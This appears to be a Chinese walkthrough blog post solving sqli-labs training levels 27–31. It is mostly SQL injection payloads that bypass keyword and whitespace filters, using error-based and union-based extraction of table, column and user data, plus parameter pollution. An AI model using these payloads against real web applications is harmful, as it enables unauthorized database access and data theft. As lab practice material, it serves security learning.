sqli-labs(6)

27.

过滤了union和select 使用双写绕过

有报错信息使用报错注入

1'and(extractvalue(1,concat(0x5c,database())))and'1'='1
1'and(updatexml(1,concat(0x7e,database(),0x7e),1))and'1'='1

1'and(extractvalue(1,concat(0x5c,(selseselectlectect(group_concat(table_name))from(information_schema.tables)where(table_schema='security')))))and'1'='1
1'and(updatexml(1,concat(0x7e,(seselselectectlect(group_concat(table_name))from(information_schema.tables)where(table_schema='security')),0x7e),1))and'1'='1

1'and(extractvalue(1,concat(0x5c,(seselselectectlect(group_concat(column_name))from(information_schema.columns)where(table_schema='security')and(table_name='users')))))and'1'='1
1'and(updatexml(1,concat(0x7e,(seselselectectlect(group_concat(column_name))from(information_schema.columns)where(table_schema='security')and(table_name='users')),0x7e),1))and'1'='1

1'and(extractvalue(1,concat(0x5c,(seselselectectlect(group_concat(username))from(security.users)))))and'1'='1
1'and(updatexml(1,concat(0x7e,(seselselectectlect(group_concat(username))from(security.users)),0x7e),1))and'1'='1

这里显示不了所有的数据可以使用limit

27a.

没报错信息了

‘不能闭合尝试“发现”可以闭合

0"ununionion%a0seselselectectlect%a01,2,3%a0and"1"="1

0"ununionion%a0seselselectectlect%a01,database(),3%a0and"1"="1

0"ununionion%a0seselselectectlect%a01,(seselselectectlect%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema='security'),3%a0and"1"="1

0"ununionion%a0seselselectectlect%a01,(seselselectectlect%a0group_concat(column_name)%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0and%a0table_name='users'),3%a0and"1"="1

0"ununionion%a0seselselectectlect%a01,(seselselectectlect%a0group_concat(username)%a0from%a0security.users),3%a0and"1"="1

28.

不会返回报错信息无法使用报错注入

1')union%a0select%a01,2,3;%00

0')union%a0select%a01,database(),3;%00

0')union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema='security'),3;%00

0')union%a0select%a01,(select%a0group_concat(column_name)%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0and%a0table_name='users'),3;%00

0')union%a0select%a01,(select%a0group_concat(username)%a0from%a0security.users),3;%00

28a.

0')union%a0select 1,2,3;%00

0')union%a0select 1,database(),3;%00

0')union%a0select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3;%00

0')union%a0select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3;%00

0')union%a0select 1,(select group_concat(username) from security.users),3;%00

29.

题目显示会检测输入的参数是不是数字类型,在sql语句中接收相同的参数时会使用后面的值

这里传递两个id

&id=0'union select 1,database(),3 --+

&id=0'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

&id=0'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+

&id=0'union select 1,(select group_concat(username) from security.users),3 --+

30.

单引号换成双引号

&id=0"union select 1,2,3 --+

&id=0"union select 1,database(),3 --+

&id=0"union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

&id=0"union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+

&id=0"union select 1,(select group_concat(username) from security.users),3 --+

31.

&id=0")union select 1,2,3 --+

多了个括号

&id=0")union select 1,database(),3--+

&id=0")union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

&id=0")union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+

&id=0")union select 1,(select group_concat(username) from security.users),3--+

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/204471.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Spring Boot 3 + Spring Security 6 最新版本修改 Json 登录后 RememberMe 功能问题失效的解决方案

当 Spring Boot 版本更新到 3 之后,最低要求的 JDK 版本变为 17,相应的 最新版本的 Spring Security 的配置也发生了变化,一下主要讲解一些新的 Spring Security 的配置方法 1. 配置由继承WebSeucrityConfigurerAdapter变成只需添加一个Secur…

每天五分钟计算机视觉:LeNet是最早用于数字识别的卷积神经网络

LeNet 假设你有一张 32321 的图片,然后使用 6 个 55的过滤器,步幅为 1,padding 为 0,输出结果为 28286。图像尺寸从 3232 缩小到 2828。 然后进行池化操作,使用平均池化,过滤器的宽度为 2,步幅为 2,图像的尺寸,高度和宽度都缩小了 2 倍,输出结果是一个14146 的图像。…

【LeetCode】挑战100天 Day13(热题+面试经典150题)

【LeetCode】挑战100天 Day13(热题面试经典150题) 一、LeetCode介绍二、LeetCode 热题 HOT 100-152.1 题目2.2 题解 三、面试经典 150 题-153.1 题目3.2 题解 一、LeetCode介绍 LeetCode是一个在线编程网站,提供各种算法和数据结构的题目&…

Redis 持久化机制

client Redis[内存] --> 内存数据、磁盘数据----> 磁盘,Redis官方提供了两种不同的持久化方案将内存中的数据存储在硬盘中: 快照(Snapshot) AOF只追加日志文件。 1、快照(Snapshot) 1、快照的特点…

鸿蒙开发报错:agconnect sdk not initialized. please call initialize()【BUG已解决】

文章目录 项目场景:问题描述原因分析:解决方案:总结:项目场景: 鸿蒙开发报错: agconnect sdk not initialized. please call initialize() 问题描述 报错内容为: 10-25 11:41:01.152 6076-16676 E A0c0d0/JSApp: app Log: 数据查询失败: {“code”:1100001,“messag…

Boot工程快速启动【Linux】

Boot工程快速启动【Linux】 在idea中打包cd usr/在local文件夹下mkdir app进入app文件夹把打包好的文件(只上传其中的jar)上传到app文件下检查linux中的Java版本,保证和项目的Java 版本保持一致运行 java -jar sp补全***.jar想看效果得查询当…

九、LuaTable(表)

文章目录 一、定义二、Table(表)的构造三、Table 操作(一)Table连接(二)插入和移除(三)Table 排序(四)Table 最大值 一、定义 table 是 Lua 的一种数据结构用来帮助我们创建不同的数…

数组filter()方法的使用

输入价格后失去焦点就展示符合条件的商品&#xff0c;没有符合条件的商品就弹框提示 <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-…

蓝桥杯-01简介

文章目录 蓝桥杯简介参考资源蓝桥杯官网第15届大赛章程一、概况&#xff08;一&#xff09;大赛背景和宗旨&#xff08;二&#xff09;大赛特色&#xff08;三&#xff09;大赛项目1.Java软件开发2.C/C程序设计3.Python程序设计4.Web应用开发5.软件测试6.网络安全7.嵌入式设计与…

汇编-pop出栈指令

32位汇编 执行动作分为两步&#xff1a; 第一步&#xff1a;读出数据 第二步&#xff1a;改变栈地址 如果操作数是16位&#xff0c; 则ESP加2&#xff1b; 如果操作数是32位&#xff0c; 则ESP加4 espesp2 或 espesp4 格式&#xff1a;

【问题系列】消费者与MQ连接断开问题解决方案(二)

1. 问题描述 当使用RabbitMQ作为中间件&#xff0c;而消费者为服务时&#xff0c;可能会出现以下情况&#xff1a;在长时间没有消息传递后&#xff0c;消费者与RabbitMQ之间出现连接断开&#xff0c;导致无法处理新消息。解决这一问题的方法是重启Python消费者服务&#xff0c;…

STM32通用定时器产生PWM信号

STM32通用定时器产生PWM信号 PWM信号stm32定时器PWM生成模式PWM配置基本步骤PWM周期计算CubeMX配置代码展现 本期内容我将展示使用STM32通用定时器产生PWM信号&#xff0c;这里以定时器3通道3为例 PWM信号 如果还不懂的话&#xff0c;可以看看 &#xff1a; “蓝桥杯单片机学习…

AI:87-基于深度学习的街景图像地理位置识别

🚀 本文选自专栏:人工智能领域200例教程专栏 从基础到实践,深入学习。无论你是初学者还是经验丰富的老手,对于本专栏案例和项目实践都有参考学习意义。 ✨✨✨ 每一个案例都附带有在本地跑过的代码,详细讲解供大家学习,希望可以帮到大家。欢迎订阅支持,正在不断更新中,…

2015年五一杯数学建模B题空气污染问题研究解题全过程文档及程序

2015年五一杯数学建模 B题 空气污染问题研究 原题再现 近十年来&#xff0c;我国 GDP 持续快速增长&#xff0c;但经济增长模式相对传统落后&#xff0c;对生态平衡和自然环境造成一定的破坏&#xff0c;空气污染的弊病日益突出&#xff0c;特别是日益加重的雾霾天气已经干扰…

企业如何选择安全又快速的大文件传输平台

在现代信息化社会&#xff0c;数据已经成为各个行业的重要资源&#xff0c;而数据的传输和交换则是数据价值的体现。在很多场合&#xff0c;企业需要传输或接收大文件&#xff0c;例如设计图纸、视频素材、软件开发包、数据库备份等。这些文件的大小通常在几百兆字节到几十个字…

Java 8 中 ReentrantLock 与 Synchronized 的区别

&#x1f680; 作者主页&#xff1a; 有来技术 &#x1f525; 开源项目&#xff1a; youlai-mall &#x1f343; vue3-element-admin &#x1f343; youlai-boot &#x1f33a; 仓库主页&#xff1a; Gitee &#x1f4ab; Github &#x1f4ab; GitCode &#x1f496; 欢迎点赞…

什么是轻量应用服务器?可以从亚马逊云科技的优势入手了解

什么是轻量应用服务器&#xff1f; 随着如今各行各业对云计算的需求越来越多&#xff0c;云服务器也被越来越多的企业所广泛采用。其中&#xff0c;轻量应用服务器是一种简单、高效、可靠的云计算服务&#xff0c;能够为开发人员、企业和个人提供轻量级的虚拟专用服务器&#x…

Python语言学习笔记之二(基础语法)

本课程对于有其它语言基础的开发人员可以参考和学习&#xff0c;同时也是记录下来&#xff0c;为个人学习使用&#xff0c;文档中有此不当之处&#xff0c;请谅解。 Python几种字符串的表示&#xff1a; 在Python中&#xff0c;字符串是一种基本的数据类型&#xff0c;可以使…

【shell】多行重定向与免交互expect与ssh、scp的结合使用

目录 一、多行重定向 举例1&#xff1a;使用read命令接收用户的输入值会有交互过程 举例2&#xff1a;设置变量的值 举例3&#xff1a;创建用户密码 举例4&#xff1a;使用多行重定向写入文件中&#xff08;以repo文件举例&#xff09; 举例5&#xff1a;变量设定 二、免…

解析d3dcompiler_47.dll缺失怎么修复,4种方法修复d3dcompiler_47.dll文件

d3dcompiler_47.dll缺失怎么修复&#xff1f;其实在我们使用计算机操作的过程中&#xff0c;有时会遇到一些由dll文件错误导致的问题&#xff0c;其中d3dcompiler_47.dll丢失就是这样一种。那么究竟d3dcompiler_47.dll缺失是什么意思&#xff0c;为何它会发生丢失&#xff0c;以…